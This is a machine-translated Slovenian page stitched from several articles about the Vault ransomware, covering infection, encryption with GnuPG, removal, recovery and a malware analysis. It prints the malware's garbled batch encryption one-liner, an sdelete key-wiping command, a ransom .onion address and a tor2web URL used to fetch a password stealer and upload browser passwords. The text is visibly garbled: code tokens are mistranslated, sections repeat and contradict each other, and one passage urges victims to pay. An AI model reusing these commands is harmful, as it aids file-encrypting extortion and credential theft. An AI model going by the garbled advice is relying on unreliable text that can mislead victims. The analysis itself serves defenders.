Vault virus, kako obnoviti datoteke Windows XP. Kako sami obnoviti datoteke po virusu Vault. Virus trezorja - kaj storiti
Protivirusni strokovnjaki Doctor Web so razvili metodo za dešifriranje datotek, ki so postale nedostopne zaradi delovanja nevarnega trojanskega kodirnika. Trojanec.Encoder.2843 uporabnikom znan kot "trezor".
Ta različica ransomware, poimenovana po klasifikaciji Dr.Web Trojanec.Encoder.2843, kibernetski kriminalci aktivno širijo z uporabo množičnih poštnih seznamov. Majhna datoteka, ki vsebuje skript v JavaScriptu, se uporablja kot priloga k črkam. To datoteko iz sebe ekstrahira aplikacija, ki izvede preostala dejanja, potrebna za zagotovitev delovanja kodirnika. Ta različica ransomware Trojan se distribuira od 2. novembra 2015.
Kako to zlonamerna programska oprema tudi precej radoveden. V sistem Windows register napisana je šifrirana dinamična knjižnica (.DLL), trojanec pa v proces explorer.exe, ki se izvaja, vnese majhno kodo, ki prebere datoteko iz registra v pomnilnik, jo dešifrira in nanjo prenese nadzor.
Seznam šifriranih datotek Trojanec.Encoder.2843 shranjuje tudi v sistemski register in za vsako od njih uporablja edinstven ključ, sestavljen iz velikih latiničnih črk. Datoteke so šifrirane z algoritmi Blowfish-ECB, ključ seje je šifriran z RSA z uporabo vmesnika CryptoAPI. Vsaki šifrirani datoteki je dodeljena končnica .vault.
Strokovnjaki Doctor Web so razvili posebno tehniko, ki v mnogih primerih omogoča dešifriranje datotek, ki jih poškoduje ta trojanec. Če ste žrtev zlonamerne programske opreme Trojanec.Encoder.2843, uporabite naslednja navodila:
- kontaktirajte policijo z ustrezno izjavo;
- v nobenem primeru ne poskušajte znova namestiti operacijski sistem, »Optimizirajte« ali »počistite« s katerim koli pripomočkom;
- ne izbrišite nobenih datotek v računalniku;
- ne poskušajte sami obnoviti šifriranih datotek;
- kontaktirajte tehnično podporo Doctor Web (ta storitev je brezplačna za uporabnike komercialnih licenc Dr.Web);
- Na vstopnico priložite katero koli datoteko, ki jo šifrira trojanec;
- počakajte na odgovor strokovnjaka za tehnično podporo; zaradi velikega števila zahtev lahko to traja nekaj časa.
Opozarjamo vas, da so storitve dešifriranja datotek na voljo samo imetnikom komercialnih licenc za protivirusne izdelke Dr.Web. Doctor Web ne jamči, da bodo vse datoteke, ki jih poškoduje kodirnik, dešifrirane, vendar se bodo naši strokovnjaki potrudili, da shranijo šifrirane podatke.
Naš članek je posvečen še eni "mojstrovini" hekerjev - virusu ransomware Vault. Povedali vam bomo, kakšen virus Vault je in kako vpliva na sistem. Razmislimo o možnostih, s katerimi lahko obnovite datoteke.
Virus trezorja - kaj storiti?!
Nekega "lepega" dne ste odprli namizje in videli tekoči zvezek z naslednjim besedilom:
Na podlagi tega postane jasno - postali ste "nesrečni lastnik" virusa Vault. Ta virus okuži vaš računalnik in začne šifrirati vaše datoteke. Tako spadajo pod šifriranje datoteke s končnicami .pdf, .doc, .docx, .xls, .xlsx, .jpeg, .zip itd. Po zagonu virusa se imenu datoteke doda pripona .vault. Tudi virus v nekaterih primerih vpliva na lokalne baze podatkov 1C. Kot lahko vidite, trezor šifrira vse dokumente, ki so priljubljeni za delo.
Morda se sprašujete: Kako je trezor prišel na moj računalnik? Tukaj je vse tako enostavno kot luščenje hrušk, so vam napadalci poslali E-naslov pismo. Naslov pisma je govoril o njegovem pomenu in nujnosti, da ga odpremo in preberemo. Lahko je pismo banke, partnerjev ali kakšna donosna ponudba. V tem pismu je bil priložen dokument s končnico .js (Java skript).
Ko se zažene (in ste jo zagnali!) Ta razširitev virusa prenese program za šifriranje s hekerskih strežnikov. V vašem primeru je virus izsiljevalske programske opreme Vault legitimna kriptografska programska oprema GPG (GnuPG) z uporabo priljubljenega šifrirnega algoritma rsa-1024. Program ni virus, zato ga protivirusni programi ne blokirajo in ne omogočajo delovanja. GPG generira javne (na vašem računalniku) in zasebne (na napadalčevem strežniku) šifrirne ključe.
Obstaja veliko modifikacij virusa Vault, na primer za Windows 7/8, 32-bitne ali 64-bitne sisteme. In ko pride v vsako, virus deluje na svoj način. Prav tako lahko virus šifrira računalnike v istem omrežju kot vaše.
Kako odstraniti virus Vault iz računalnika?
Virus deluje tako, da se v mapi z izvorno datoteko ustvari datoteka, podobna končnici .pg. Nato se ta datoteka dvigne, nadomesti izvirno datoteko in doda razširitev trezorja. S preprostim preimenovanjem dokumenta se tukaj ne znebi. Zato ugotovimo, kako obnoviti datoteke in odstraniti virus trezorja.
Sama odstranitev virusa
Takoj, ko v svojih dokumentih najdete razširitev trezorja, takoj izklopite omrežje in prenehajte delati z vsemi aplikacijami, ne odpirajte znova map na diskih. Prijavite se z varni način.
V smislu odstranitve virus Vault ni težaven. Odstraniti ga ni težko, za to uporabite najbolj priljubljene programe za odstranjevanje takšnih virusov, kodirnikov, oglasnih pasic, trojancev. Ampak težave se bodo nadaljevale :(.
Kar morate vedeti, je, da je samo telo virusa skrito v mapi Temp. Virus je sestavljen iz naslednjih datotek:
- 3c21b8d9.cmd;
- fabac41c.js;
- VAULT.txt;
- Sdc0.bat;
- VAULT.KEY;
- CONFIRMATION.KEY.
Vse te datoteke, razen zadnjih dveh (!), je treba izbrisati. Nato zaženite čistilec, počistite zagon, preverite register za napake (načelo je enako za Windows 7/8/10). Zadnji 2 datoteki morate pustiti v računalniku, ker:
- VAULT.KEY - sam šifrirni ključ. Pod nobenim pogojem se ne sme izbrisati! Posreduje se napadalcem, pri analizi vam bodo dali drugi del ključa za dešifriranje.
- CONFIRMATION.KEY - datoteka z popolne informacije o številu šifriranih datotek v računalniku. potrebno je tudi za hekerje.
Brezplačno obnovite datoteke s pripono .vault
Tako smo prišli do najhujšega – datoteke so ostale šifrirane. Brezplačnih dešifrorjev za virus trezorja ni. Datoteke s ključem rsa-1024 lahko dešifrira samo originalni program.
Kateri so načini za obnovitev datotek:
![](https://i0.wp.com/itfaqs.ru/wp-content/uploads/2015/09/2015-09-23-16-30-18-%D0%A1%D0%BA%D1%80%D0%B8%D0%BD%D1%88%D0%BE%D1%82-%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0.png)
Če v smetnjakih niste našli ničesar in ni obnovitvenih točk sistema, boste morali plačati kibernetski kriminalci. Nič ne morete storiti glede tega. Če analiziramo dialoge na forumih, sledi sklep - da napadalci dejansko dešifrirajo datoteke, vendar morate za to plačati.Če to ne bi bilo res, bi se to od ust do ust na internetu razširilo že zdavnaj in ljudje ne bi bili napeljani k temu. Treba je razumeti, da je to cel "poslovni sistem" - ujeli ste, zdaj plačate in vse bo v redu.
Prišlo je do točke, da na internetu že obstajajo super-agenti! Se pravi posredniki, ki bodo namesto vas stopili v stik z napadalci in rešili vse vaše težave. Od vas je odvisno, ali to storite ali ne. Če tega ne želite narediti sami, plačajte več.
Po navodilih iz besedilne datoteke boste zagnali brskalnik Tor (posebej za brisanje IP-ja), nato pa boste preusmerjeni na eno od spletnih mest kibernetskih kriminalcev. Obstaja priročnik za delo s spletnim mestom in celo sistem popustov :(.
Kaj pa protivirusni program?
Na žalost, kot je navedeno zgoraj, protivirusna programska oprema Dr Web, Kaspersky, Avast in drugi ne morejo storiti ničesar. Konec koncev program sam po sebi ni virus. Uradne zahteve za tehnično podporo Kaspersky Lab se končajo s podrobnimi zgodbami o trezorju in predlogi za uporabo njihovih dekodirnikov RannohDecryptor, ScatterDecryptor, Rector Decryptor, RakhniDecryptor ali Xorist Decryptor. Doktor Web na splošno svetuje, da se o dejstvu nepooblaščenega dostopa do računalnika obrnete na policijo. No, hvala doktor.
Kot vidite, možnosti ni veliko, in če so vam datoteke res pomembne, boste morali plačati. S tem je tudi nemogoče potegniti, strežniki z bazami podatkov in spletnimi mesti se nenehno premikajo - stari se izbrišejo in pojavijo se novi.
In tukaj je kratek videoposnetek, kjer si lahko ogledate, kako virus Vault deluje na sistem. Ta video ni reklama :).
- Najverjetneje se soočate s tako težavo, kot je šifriranje datotek in s tem brez vaše vednosti željo. Z odpiranjem povezave v pismu, ki vam je prišlo po pošti in najverjetneje od preverjenega pošiljatelja, s katerim ste si že dopisovali. Ampak morda kot reklama! Toda dejstvo je na vašem obrazu in imate naslednje simptome, ki se kažejo na naslednji način:
- Vaši delovni dokumenti in baze podatkov so zaklenjeni in označeni s formatom .vault
- Če jih želite obnoviti, morate pridobiti edinstven ključ
- POSTOPEK PRIDOBITVE KLJUČA:
- NAKRATKO
- 1. Pojdite na naš spletni vir
- 2. Zagotovite si svoj ključ
- 3. Obnovite datoteke na prejšnjo obliko
- PODROBNO
- Korak 1:
- Prenesite brskalnik Tor z uradne spletne strani: https://www.torproject.org
- 2. korak:
- Z brskalnikom Tor obiščite spletno mesto: https://restoredz4xpmuqr.onion
- 3. korak:
- Poiščite svoj edinstveni VAULT.KEY na vašem računalniku – to je vaš ključ do vaše osebne odjemalske plošče. Ne izbrišite ga
- Prijavite se na spletno mesto z uporabo VAULT.KEY
- Pojdite na razdelek s pogostimi vprašanji in preberite nadaljnji postopek
- 4. KORAK:
- Po prejemu ključa lahko datoteke obnovite z našo odprtokodno programsko opremo izvorno kodo ali pa je varna uporaba programske opreme
- DODATNO
- a) Ne boste mogli obnoviti datotek brez edinstvenega ključa (ki je varno shranjen na našem strežniku)
- b) Če ne najdete svojega VAULT.KEY, poiščite začasno mapo TEMP
- c) Vaš strošek obnove ni dokončen, pišite na klepet
- Datum zaklepanja: 8. 4. 2015 (11:14)
- Po vaši presoji. Lahko narediš, kot piše v datoteki (vendar ne bi). Zakaj? Ker ni zanesljivo, je plačilo izsiljevalcem namenjeno ohranjanju in razvoju njihove moči. In potem, vryatli, boste dobili ključ za dešifriranje.
- Pojav takšnega sporočila že pomeni, da je virus trezorja okužil vaš računalnik in začel šifrirati datoteke. Na tej točki morate takoj izklopiti računalnik, ga izklopiti iz omrežja in odstraniti vse odstranljivi mediji... O tem, kako zdraviti virus, bomo govorili kasneje, za zdaj pa vam bom povedal, kaj se je zgodilo v vašem sistemu.
- Najverjetneje ste prejeli pismo po pošti od zaupanja vredne nasprotne stranke ali prikrito znana organizacija... To je lahko zahteva za izvedbo računovodske uskladitve za določeno obdobje, zahteva za potrditev plačila računa po pogodbi, ponudba za seznanitev z dolgom posojila pri Sberbank ali kaj drugega. A informacije bodo takšne, da vas bodo zagotovo zanimale in odprli boste e-poštno prilogo z virusom. To je tisto, kar šteje.
- Torej odprete prilogo, ki ima razširitev .js in je skript Java. Teoretično bi vas to že moralo opozoriti in preprečiti odpiranje, a če berete te vrstice, pomeni, da vas ni opozorilo in ni ustavilo. Skript s strežnika napadalca, kot bi ga lahko imenovali v tem primeru, naloži trojanca ali trezor pasic in program za šifriranje. Vse to postavi v začasni imenik uporabnika. In postopek šifriranja datotek se takoj začne na vseh mestih, kjer ima uporabnik dostop - omrežni pogoni, bliskovni pogoni, zunanji trdi diski itd.
- Izsiljevalska programska oprema za trezor je brezplačen pripomoček za šifriranje gpg in priljubljen algoritem za šifriranje - RSA-1024. Ker se ta pripomoček v bistvu pogosto uporablja tam, kjer sam po sebi ni virus, ga protivirusni programi prepuščajo in ne blokirajo njegovega dela. Odprto in zasebni ključ za šifriranje datotek. Zasebni ključ ostane na strežniku hekerjev in je javen na uporabnikovem računalniku.
- Po začetku postopka šifriranja traja nekaj časa. Odvisno je od več dejavnikov – hitrosti dostopa do datotek, zmogljivosti računalnika. Nato se prikaže informativno sporočilo besedilna datoteka, katerega vsebino sem podal na samem začetku. Na tej točki so nekateri podatki že šifrirani.
- Natančneje, naletel sem na modifikacijo virusa trezorja, ki je deloval samo na 32-bitnih sistemih. Poleg tega se v sistemu Windows 7 z omogočenim UAC prikaže poziv za vnos skrbniškega gesla. Virus ne more storiti ničesar brez vnosa gesla. V operacijskem sistemu Windows XP začne delovati takoj po odprtju datoteke iz pošte, ne postavlja nobenih vprašanj.
- Kaj točno virus počne z datotekami? Na prvi pogled je videti, kot da samo spreminja razširitev iz standardne v .vault. Ko sem prvič videl delovanje tega virusa izsiljevalske programske opreme, sem mislil, da gre za otroško ožičenje. Datoteko sem preimenoval nazaj in bil zelo presenečen, ko se ni odprla po pričakovanjih, namesto predvidene vsebine pa se je odprla zmešnjava nerazumljivih znakov. Potem sem ugotovil, da ni vse tako preprosto, začel sem razumeti in iskati informacije.
- Virus je pregledal vse priljubljene vrste datotek - doc, docx, xls, xlsx, jpeg, pdf in druge. Standardnemu imenu datoteke je bila dodana nova razširitev .vault. Za nekatere tudi šifrira datoteke z lokalnimi bazami podatkov 1C. Jaz takega nisem imel, zato tega osebno nisem opazil. Preprosto preimenovanje datoteke nazaj, kot razumete, tukaj ne pomaga.
- Ker postopek šifriranja ni trenuten, se lahko zgodi, da ko ugotovite, da imate v računalniku virus, bodo nekatere datoteke še vedno normalne, nekatere pa okužene. Dobro je, če večina ostane nedotaknjena. Toda pogosteje kot ne, na to ni mogoče računati.
- Povedal vam bom, kaj se skriva za spremembo razširitve. Po šifriranju na primer datoteke.doc poleg nje virus trezorja ustvari šifrirano datoteko file.doc.gpg, nato pa se šifrirana datoteka.doc.gpg premakne na prvotno mesto z novim imenom file.doc in šele nato se preimenuje v file.doc.vault. Izkazalo se je, da izvirna datoteka ni izbrisana, ampak prepisana s šifriranim dokumentom. Po tem ga ni mogoče obnoviti s standardnimi orodji za obnovitev. izbrisane datoteke... Tukaj je del kode, ki izvaja to funkcionalnost:
- Ko odkrijete virus izsiljevalske programske opreme, je prvi korak, da se ga znebite tako, da ozdravite svoj računalnik. Najbolje je, da se zaženete iz nekaterih zagonski disk in ročno očistite sistem. Virusni trezor v smislu korozivnosti za sistem ni težak, enostavno ga je očistiti sami. Na tej točki se ne bom podrobneje zadrževal, saj so tukaj primerna standardna priporočila za odstranjevanje virusov izsiljevalske programske opreme, pasic in trojancev.
- Samo telo virusa se nahaja v začasni mapi uporabnika, ki ga je zagnal. Virus je sestavljen iz naslednjih datotek. Imena se lahko spremenijo, vendar bo struktura približno enaka:
Nenadoma se v beležnici odpre besedilna datoteka z naslednjo vsebino:
Virus razširi razširitev trezorja na doc, jpg, xls in druge datoteke
dir / B "% 1:" && za / r "% 1:" %% i v (* .xls * .doc) naredi (odmeva "%% TeMp %% \ svchost.exe" -r Kleti --da - q --no-verbose --trust-model vedno --encrypt-files "%% i" ^ & premakni / y "%% i.gpg" "%% i" ^ & preimenuj "%% i" "%% ~ nxi.vault ">>"% temp% \ cryptlist.lst "echo %% i >>"% temp% \ conf.list ")
Kako odstraniti virus trezorja in ozdraviti računalnik
- 3c21b8d9.cmd
- 04fba9ba_VAULT.KEY
- CONFIRMATION.KEY
- fabac41c.js
- Sdc0.bat
- VAULT.KEY
- VAULT.txt
Kako obnoviti in dešifrirati datoteke po virusu trezorja
"% temp% \ sdelete.exe" / accepteula -p 4 -q "% temp% \ secring.gpg"
Kaspersky, drweb in drugi protivirusni programi v boju proti izsiljevalski programski opremi za trezor
Metode zaščite pred virusi v trezorju
Izsiljevalska programska oprema VAULT se je prvič pojavila v Rusiji februarja 2015 in si pridobila ugled eden najnevarnejših in neozdravljive viruse. Novembra se je začel drugi val okužb, ki je bil bolj množičen. Tretji val se zgodi sredi januarja 2016. in po številu okuženih naprav prekaša prejšnje.
Kaj je VAULT ransomware virus?
Virus VAULT je oblika trojanskega kodirnika.
Program s prodorom v računalnik z uporabniškimi dejanji šifrira določeno vrsto podatkov z desetinami algoritmov z edinstvenim vzorcem.
Izvirni podatki se ne izbrišejo, ampak se nadomestijo s poškodovanimi, zaradi česar je možnost njihove obnovitve skoraj nemogoča.
Ključ, ki omogoča dešifriranje informacij, se ob koncu šifriranja samodejno izbriše iz sistema.
Cilj napadalcev je izsiliti denar v zameno za dešifriranje podatkov. Tudi v tem primeru verjetnost dešifriranja datoteke ne presega 50%.
Primer računalnika, okuženega z virusom VAULT: na delujočo e-pošto prispe zahteva za primarno dokumentacijo nasprotne stranke ali obvestilo ConsultantPlus o potrebi po namestitvi posodobitvenega paketa. Pismu je priložena datoteka s pojasnili. Takoj, ko se zaženejo izvedljive in pomožne datoteke, se začne postopek šifriranja podatkov.
Katere datoteke šifrira VAULT?
Napadalce zanimajo komercialne informacije, pa tudi foto, avdio in video material. Tako so napadene datoteke naslednjih razširitev: .rar, .zip, .jpg, .psd, .doc, .xls, .ppt, .pdf, .mp3, .ogg, .avi, .mpeg, .html, .txt, baze podatkov 1C itd.
Ko je računalnik okužen, a Besedilni dokument s stiki prevarantov. Stroški dešifriranja podatkov se gibljejo od 10 do 50.000 dolarjev. Stroške ocenijo goljufi, potem ko uporabnik stopi v stik. Višina odkupnine je odvisna od količine šifriranih informacij. Hkrati ni nobenega zagotovila, da bodo podatki vsaj delno obnovljeni.
Kako zaščititi svoj računalnik pred šifrirnikom VAULT?
V večini primerov pride do okužbe, ko v računalniku ni protivirusnega programa ali ko brezplačna različica VKLOPLJENO. Najmanj zanesljiv je po našem mnenju protivirusni program Avast.
Kljub temu lastniki licenčnega protivirusnega programskega paketa, vključno s korporativnimi različicami, pogosto postanejo žrtve.
Razvili so strokovnjaki za IT varnost iz ESET in Dr.Web niz univerzalnih priporočil ki pomagajo zaščititi vaš računalnik ali prenosnik pred virusom VAULT in podobnimi trojanci izsiljevalske programske opreme:
Namestite kritične posodobitve operacijskega sistema pravočasno
izberite protivirusno programsko opremo z vgrajenim požarnim zidom
onemogočite prenos in sprejem izvedljive datoteke(.exe) na poštnem strežniku
prepreči izvajanje makrov v Microsoft Office, ali podobno programsko opremo
redno telovadi rezerva podatkov
podvojite pomembne informacije na zunanje medije
Kako odstraniti VAULT iz računalnika?
Vklopljeno ta trenutek Okužba z virusom VAULT in šifriranje podatkov sta enkratna in ne vključuje okužbe sistemskih datotek. Tako je skeniranje s pripomočkom Dr.Web CureIt dovolj za odstranitev virusa iz sistema. Vendar ne pozabite, da bodo poskusi zdravljenja ali brisanja okuženih datotek, pa tudi ponovna namestitev sistema Windows, izničili možnost obnovitve šifriranih podatkov.
To pomeni, da ni nič težko odstraniti virusa, če ste se za vedno pripravljeni ločiti od šifriranih informacij ali pa ste varnostne kopije na zunanjih medijih.
Kako obnoviti datoteke VAULT?
Takoj ko ti odkrila okužbo Videli smo spremenjene ikone datotek in novo vrsto razširitev, na primer .doc.vault, takoj izklopite računalnik ali prenosnik. Dlje ko deluje, več datotek izgubite.
Ponovimo: skeniranje diska z protivirusnim programom, čiščenje datotek, ponovna namestitev sistema in druga standardna orodja bodo le zmanjšala verjetnost dešifriranja podatkov.
Nobeden od razvijalcev Protivirusna programska oprema še vedno ni mogla ustvariti pripomočka za dešifriranje informacij, izpostavljenih VAULT.
Točke obnovitve sistema uniči virus. Pri delu z operacijskim sistemom Windows Vista / 7/8/10 obstaja možnost obnovitve sistema Windows iz senčnih kopij s pomočjo pripomočka Shadow Editor. Toda v večini primerov izginejo tudi senčne kopije.
Če imate licenčni izdelek NOD32 ali Dr.Web, se lahko obrnete na njih tehnična podpora z zahtevo za dešifriranje podatkov.
Poleg tega strokovnjaki priporočajo, da se z izjavo obrnete na policijo, saj dejanja napadalcev kažejo znake kaznivih dejanj iz čl. Umetnost. 159.6, 163, 165, 272, 273 Kazenskega zakonika Ruske federacije.
Praktični rezultat takšnih dejanj je zmanjšan na nič. Dejstvo je, da še ni mogoče obnoviti datotek, ki jih šifrira VAULT. Ostanki edini izhod : fizično odstranite trdi disk ali SSD disk iz naprave in namestite novega. Morda bo kmalu na voljo način za dešifriranje informacij, nato pa jih bo mogoče obnoviti.
Virusna okužba Datoteke trezorja so šifrirane
Uporabnik najprej dobi pismo s sporočilom o izpisku davka/vodomer/račun za svetovalni ključ.
Pismo je vsebovalo povezavo do priložene datoteke iz vira download-attach.com... (zdi se, da se gostovanje plača z bitcoini) V arhivu na tej povezavi je najbolj zanimivo prikrito datoteko js, z zelo podrobnim imenom.
Ko ga zaženete % TEMP % uporabnik prikaže se več datotek in za zagon je napisan skript za zagon revault.js
Tukaj je nekaj odkritih datotek:
svchost.exe - glavna dvojiška datoteka gnupg
iconv.dll – knjižnica v skupni rabi, ki jo lahko izvaja gnupg
audiodg.exe - sDelete iz zbirke Sysinternals
Izvajanje virusa Datoteke trezorja so šifrirane
V našem primeru se je ob zagonu računalnika zagnal skript revault.js, ki je zagnal datoteko cryptlist.cmd bat. Tu se je izgubila majhna nit
Potem se je začelo zavarovan.bat vse najtemnejše stvari se dogajajo v njem.
Najprej program ustvari potrdilo za šifriranje datotek na računalniku z imenom gk.vlt (Cellar / RSA / 1024 bit)
Nato iz njega izvozi zasebni ključ, ki je potreben za dešifriranje datotek, v datoteko vaultkey.vlt
Nato ustvari javni ključ pk.vlt, ki je vnaprej določen v sami datoteki bat. S pomočjo te datoteke bo ključ, potreben za dešifriranje vaših podatkov, v prihodnosti šifriran.
Nadalje v vaultkey.vlt so napisani
BDATE - trenutni datum
UNAME - trenutno uporabniško ime
CNAME - ime računalnika
ULANG - sistemski jezik (v tem primeru je registriran v RU)
In nekaj naključnih zgoščenk 01HSH 02HSH 03HSH 04HSH 05HSH FHASH
Virusno šifriranje Datoteke trezorja so šifrirane
Šifriranje datoteke z zamenjavo izgleda takole
1 - Šifriranje datoteke
2 - Premikanje šifrirane datoteke na prvotno mesto
3 - Dodajanje pripone .vault v datoteko
Na 1. stopnji sta * .xls in * šifrirana. doc datoteke.
Na 2. stopnji se ustvarijo in zaženejo datoteke win.vbs, sdwrase.js, sdwrase.cmd, ki onemogočajo senčno kopiranje v sistemu, če je sistem Vista ali novejši
In * .pdf * so šifrirani. rtf datoteke.
Na 3. stopnji so * .psd * .dwg * šifrirani. cdr datoteke.
Na 4. stopnji so datoteke * .cd * .mdb * .1cd * .dbf * .sqlite šifrirane.
Na 5. stopnji so datoteke * .jpg * .zip šifrirane.
Vsaka datoteka se šteje, nato pa se število šifriranih datotek vsake vrste datoteke zabeleži v vaultkey.vlt
(Očitno za splošno oceno šifriranih podatkov)
Nato napadalčev ključ šifrira vaš zasebni ključ in zbrane podatke o količini podatkov.
Po tem se vaš ključ, potreben za dešifriranje podatkov, izbriše s 16 (!) kratnim ponovnim pisanjem.
Vaše datoteke so šifrirane z vašim ključem, vaš ključ pa je šifriran s ključem napadalca.
Nato se ustvarijo datoteke z obvestili.
Spletno mesto za viruse Datoteke trezorja so šifrirane
Spletno mesto kibernetskih kriminalcev gostuje v anonimnem omrežju TOR in je visoko tehnološko za tovrstne "projekte"
Obstaja polnopravni Osebni prostor in "demo različico" za 3 datoteke, ki s strani napadalca dešifrira datoteko, ki ste jo prenesli, in jo prenese s svojega strežnika. AMPAK, preden odprete dostop do datoteke, si jo bo vsiljivec ročno ogledal in če se mu bo datoteka zdela pomembna, potem ne boste dobili dostopa do teme, boste o tem obveščeni.
Obstaja celo razdelek za pomoč.
Plačilo samo z bitcoini.
Lahko se pogovorite tudi z avtorjem. Prepričevanje in grožnje so neuporabni. Napadalec lahko blokira vašo sposobnost klepeta.
Gesla iz brskalnikov - tehnika kraje gesel iz brskalnikov na okuženem virusu Datoteke trezorja so šifrirane računalnik
Po ustvarjanju datotek z obvestili je "bonus"
Ustvarjena sta skripta ultra.js in up.vbs.
Prvi naloži datoteko s prehoda tor2web s povezavo hxxp _ // tj2es2lrxelpknfp.onion.city/p.vlt in jo preimenuje v ssl.exe
To je izpis gesla brskalnika v2.6 od SecurityXploded
Vsa vaša gesla iz brskalnikov shrani v cookie.vlt
Nato druga datoteka začne nalagati vaša gesla na isti strežnik (POST v skript /x.php)
Ta strežnik je anonimiziran na enak način kot strežnik za obnovitev in plačila (nič dodatnega v glavah, vrstica Strežnik: Anon)